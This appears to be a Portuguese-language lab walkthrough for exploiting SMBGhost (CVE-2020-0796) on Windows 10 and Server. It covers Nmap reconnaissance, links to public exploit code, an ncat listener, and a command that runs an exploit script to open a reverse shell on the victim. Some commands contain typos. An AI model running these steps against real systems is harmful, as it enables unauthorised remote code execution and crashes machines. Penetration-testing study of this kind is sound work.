
Prova de conceito de exploit para CVE-2020-0796 (SMBGhost) direcionado ao Windows 10/Server SMBv3.1.1. Inclui reconhecimento com Nmap, varredura de vulnerabilidades e entrega de payload de reverse shell.
**- Versões afetadas*
- Windows 10 Versão 1903 para sistemas de 32 bits
- Windows 10 Versão 1903 para sistemas baseados em ARM64
- Windows 10 Versão 1903 para sistemas baseados em x64
- Windows 10 Versão 1909 para sistemas de 32 bits
- Windows 10 Versão 1909 para sistemas baseados em ARM64
- Windows 10 Versão 1909 para sistemas baseados em x64
- Windows Server, versão 1903 (instalação Server Core)
- Windows Server, versão 1909 (instalação Server Core)

Execute o Nmap para escanear a faixa de rede na zona DMZ
map -sS 192.168.116.0/24
nmap: É o nome do programa de escaneamento de rede**.**
-sS: Seleciona o método de varredura TCP SYN scan. Nesta varredura, o Nmap envia um pacote SYN ao servidor de destino e observa a resposta. Se o servidor de destino responder com um pacote SYN-ACK, o Nmap sabe que a porta está aberta. Se o servidor de destino responder com um pacote RST, significa que a porta está fechada.
-192.168.116.0/24: O endereço IP ou a faixa de endereços IP específica que você deseja escanear. Neste caso, a faixa de endereços é 192.168.116.0/24, que descreve todos os endereços IP de 192.168.116.1 a 192.168.116.254.

=> Observa-se que o endereço IP da máquina vítima 192.116.145 está com a porta 445 aberta.
· Use o Nmap para escanear vulnerabilidades na máquina vítima
map -p445 –script smb-protocols 192.168.116.145
nmap: É o nome do programa de escaneamento de rede.
-p445: Especifica a porta específica a ser escaneada, neste caso a porta 445. A porta 445 é frequentemente usada para comunicação com o serviço SMB (Server Message Block) em sistemas Windows.
--script smb-protocols: Seleciona o script (script) smb-protocols para realizar a varredura. Este script ajuda a verificar e exibir informações sobre as versões do protocolo SMB suportadas no servidor de destino.
192.168.116.145: O endereço IP do servidor que você deseja escanear. Neste caso, o endereço IP é configurado como 192.168.116.145.

- O resultado obtido pelo smb-protocols indica que a máquina vítima pode ter a vulnerabilidade explorável SMBv3.1.1.
- Para ter mais certeza, continue verificando a possibilidade de exploração da vulnerabilidade CVE-2020-0796 executando o script python.
[]: -https://github.com/ly4k/SMBGhost "código de exploração"

=> Resultado Vulnerable -> foi detectada a vulnerabilidade CVE 2020-0796 explorável na máquina vítima.
**Executar ataque Reverse_shell**
ncat -lvp 4444
[]: https://github.com/jamf/CVE-2020-0796-RCE-POC "código de exploração"
python SMBleedingGhost.py 192.168.116.145 192.168.44.3 4444

=> RESULTADO: A máquina atacante assume a execução do shell code na máquina vítima.

Após a conexão bem-sucedida, o atacante pode explorar e executar código arbitrário na máquina vítima com os privilégios de User da sessão de conexão.
Ao finalizar a sessão, a máquina vítima sofre erro BlueScreen e reinicia automaticamente.

*A execução da exploração pode danificar o sistema alvo*